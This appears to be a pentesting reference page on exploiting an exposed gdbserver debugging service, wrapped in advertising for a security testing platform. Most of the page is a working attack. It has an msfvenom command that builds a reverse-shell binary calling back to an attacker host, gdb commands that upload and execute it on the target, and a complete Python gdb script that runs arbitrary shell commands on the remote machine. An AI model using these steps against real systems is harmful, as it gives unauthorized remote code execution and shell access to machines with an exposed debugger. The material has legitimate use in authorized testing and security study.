Get a hacker's perspective on your web apps, network, and cloud
Find and report critical, exploitable vulnerabilities with real business impact. Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
Basic Information
gdbserver is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the "target." This setup allows the GNU Debugger to connect from a different machine, the "host," where the source code and a binary copy of the debugged program are stored. The connection between gdbserver and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups.
You can make a gdbserver listen in any port and at the moment nmap is not capable of recognising the service.
Exploitation
Upload and Execute
You can easily create an elf backdoor with msfvenom, upload it and execute is:
# Trick shared by @B1n4rySh4d0wmsfvenom-plinux/x64/shell_reverse_tcpLHOST=10.10.10.10LPORT=4444PrependFork=true-felf-obinary.elfchmod+xbinary.elfgdbbinary.elf# Set remote debuger targettargetextended-remote10.10.10.11:1337# Upload elf fileremoteputbinary.elfbinary.elf# Set remote executable filesetremoteexec-file/home/user/binary.elf# Execute reverse shell executablerun# You should get your reverse-shell
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.targetextended-remote192.168.1.4:2345# Load our custom gdb command `rcmd`.source./remote-cmd.py# Change to a trusty binary and run it to load itsetremoteexec-file/bin/bashr# Run until a point where libc has been loaded on the remote process, e.g. start of main().tbmainr# Run the remote command, e.g. `ls`.rcmdls
First of all create locally this script:
remote-cmd.py
#!/usr/bin/env python3import gdbimport reimport tracebackimport uuidclassRemoteCmd(gdb.Command):def__init__(self): self.addresses ={} self.tmp_file =f'/tmp/{uuid.uuid4().hex}' gdb.write(f"Using tmp output file: {self.tmp_file}.\n") gdb.execute("set detach-on-fork off") gdb.execute("set follow-fork-mode parent") gdb.execute("set max-value-size unlimited") gdb.execute("set pagination off") gdb.execute("set print elements 0") gdb.execute("set print repeats 0")super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)defpreload(self):for symbol in ["close","execl","fork","free","lseek","malloc","open","read", ]: self.load(symbol)defload(self,symbol):if symbol notin self.addresses: address_string = gdb.execute(f"info address {symbol}", to_string=True) match = re.match(f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE )if match andlen(match.groups())>0: self.addresses[symbol]= match.groups()[0]else:raiseRuntimeError(f'Could not retrieve address for symbol "{symbol}".')return self.addresses[symbol]defoutput(self):# From `fcntl-linux.h` O_RDONLY =0 gdb.execute(f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})' )# From `stdio.h` SEEK_SET =0 SEEK_END =2 gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})') gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')ifint(gdb.convenience_variable("len"))<=0: gdb.write("No output was captured.")return gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)') gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)') gdb.execute('printf "%s\\n", (char*) $mem') gdb.execute(f'call (int){self.load("close")}($fd)') gdb.execute(f'call (int){self.load("free")}($mem)')definvoke(self,arg,from_tty):try: self.preload() is_auto_solib_add = gdb.parameter("auto-solib-add") gdb.execute("set auto-solib-add off") parent_inferior = gdb.selected_inferior() gdb.execute(f'set $child_pid = (int){self.load("fork")}()') child_pid = gdb.convenience_variable("child_pid") child_inferior =list(filter(lambdax: x.pid == child_pid, gdb.inferiors()) )[0] gdb.execute(f"inferior {child_inferior.num}")try: gdb.execute( f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
)except gdb.error as e:if ("The program being debugged exited while in a function called from GDB"instr(e) ):passelse:raise efinally: gdb.execute(f"inferior {parent_inferior.num}") gdb.execute(f"remove-inferiors {child_inferior.num}") self.output()exceptExceptionas e: gdb.write("".join(traceback.TracebackException.from_exception(e).format()))raise efinally: gdb.execute(f'set auto-solib-add {"on"if is_auto_solib_add else"off"}')RemoteCmd()
Get a hacker's perspective on your web apps, network, and cloud
Find and report critical, exploitable vulnerabilities with real business impact. Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
